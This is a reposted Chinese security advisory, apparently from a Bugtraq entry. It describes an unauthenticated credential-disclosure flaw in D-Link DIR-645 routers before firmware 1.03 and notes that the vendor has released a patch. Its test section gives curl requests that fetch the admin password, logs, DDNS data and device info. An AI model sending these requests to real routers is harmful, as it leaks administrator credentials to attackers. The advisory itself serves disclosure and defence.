发布日期:2013-02-28
更新日期:2013-03-05受影响系统:
D-Link DIR-645 1.x
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 58231
D-Link DIR-645是无线路由器。
运行固件1.03之前版本的D-Link DIR-645,其Web界面上存在无需身份验证的网页,可被未经身份验证的远程攻击者利用泄露管理凭证,包括明文密码等敏感信息。
<*来源:Roberto Paleari (roberto.paleari@emaze.net)
链接:http://secunia.com/advisories/52432/
http://archives.neohapsis.com/archives/bugtraq/2013-02/0151.html
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Roberto Paleari (roberto.paleari@emaze.net)提供了如下测试方法:
获取管理员密码:
curl -d SERVICES=DEVICE.ACCOUNT http://<device ip>/getcfg.php
读取系统日志:
curl http://<device ip>/log_get.php
获取DDNS信息:
curl -d act=getreport http://<device ip>/ddns_act.php转储设备信息:
curl http://<device ip>/DevInfo.php建议:
--------------------------------------------------------------------------------
厂商补丁:
D-Link
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.dlink.com/FFmpeg "ff_h264_decode_seq_parameter_set()" 函数拒绝服务漏洞Sami FTP Server "LIST"命令栈缓冲区溢出漏洞相关资讯 D-Link安全漏洞
- 多个D-Link产品UPnP SOAP接口命令 (07/11/2013 21:42:37)
- D-Link多款产品命令注入漏洞(CVE- (05/11/2013 06:09:15)
- 多个D-Link网络摄像机产品硬编码凭 (05/04/2013 07:11:55)
| - D-Link DIR-615多个远程安全漏洞 (06/08/2013 17:40:50)
- D-Link DNS-323 ShareCenter 远程 (05/04/2013 07:12:30)
- D-Link DIR-865L 跨站请求伪造漏洞 (04/23/2013 08:07:29)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
- 参与本评论即表明您已经阅读并接受上述条款
|
易网时代-编程资源站